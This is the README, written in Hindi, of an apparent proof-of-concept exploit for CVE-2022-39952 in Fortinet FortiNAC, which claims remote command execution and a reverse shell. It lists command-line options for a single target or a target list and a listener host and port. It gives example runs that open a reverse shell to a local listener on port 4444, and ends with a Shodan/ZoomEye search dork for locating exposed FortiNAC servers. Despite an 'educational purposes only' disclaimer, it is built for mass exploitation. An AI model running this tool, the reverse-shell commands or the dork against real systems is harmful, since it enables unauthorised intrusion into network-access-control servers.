
CVE-2022-39952 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण Fortinet FortiNAC को लक्षित करता है, जो कमजोर सर्वरों पर दूरस्थ कमांड निष्पादन और रिवर्स शेल सक्षम करता है।
यह एक्सप्लॉइट हमलावर को FortiNAC सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है। यह horizon3ai द्वारा विकसित PoC पर आधारित है, जिसमें कई होस्ट को लक्षित करने के लिए अतिरिक्त विकल्प शामिल हैं।
अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों के लिए है। कृपया जिम्मेदारी से और अनुमति लेकर उपयोग करें।
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
इस एक्सप्लॉइट का उपयोग करने के लिए, आपके सिस्टम पर Python 3.x स्थापित होना चाहिए।
Python 3.x
requests module
concurrent.futures module
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
इस एक्सप्लॉइट का परीक्षण केवल सीमित संख्या में लक्ष्यों पर किया गया है, इसलिए इसकी प्रभावशीलता भिन्न हो सकती है। ZoomEye और Shodan पर संभावित लक्ष्य खोजने के लिए dork निम्नलिखित है:
title:"FortiNAC" +"JSESSIONID"